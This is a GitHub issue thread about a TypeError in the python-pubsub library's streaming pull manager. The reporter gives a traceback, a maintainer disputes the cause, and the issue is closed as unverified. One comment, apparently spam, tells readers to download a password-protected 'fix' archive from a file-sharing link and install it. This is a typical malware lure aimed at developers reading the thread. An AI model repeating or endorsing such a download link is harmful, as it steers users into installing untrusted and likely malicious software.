### ISSUE TITLE
streaming_pull_manager.py throws TypeError: object of type 'NoneType' has no len()

### ISSUE THREAD

**Issue by githubwua** [googleapis/python-pubsub#1238]
Error exception:

```
File "/usr/local/lib/python3.10/site-packages/google/cloud/pubsub_v1/subscriber/_protocol/streaming_pull_manager.py", line 944, in _shutdown

 total = len(dropped_messages) + len(

 TypeError: object of type 'NoneType' has no len()
```

Thrown by this code: 

https://github.com/googleapis/python-pubsub/blame/7cf2d11ce20bf9080c4434b920bdf419faac5d88/google/cloud/pubsub_v1/subscriber/_protocol/streaming_pull_manager.py#L944

We should add a check to ensure dropped_messages is not None.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mukund-ananthu** [comment]
@githubwua The fix you provide will not help address this issue(whose existence in the latest version of the library is yet to be verified). This is because `dropped_messages` would be a list(empty or otherwise), and hence a len() on it should not result in an error.

**Comment by githubwua** [comment]
Thanks.  I will remove this issue report since it is unverified.

**Comment by githubwua** [comment]
I will close this bug for now until the issue can be verified.

**Comment by githubwua** [comment]
I will close this bug for now until the issue can be verified.
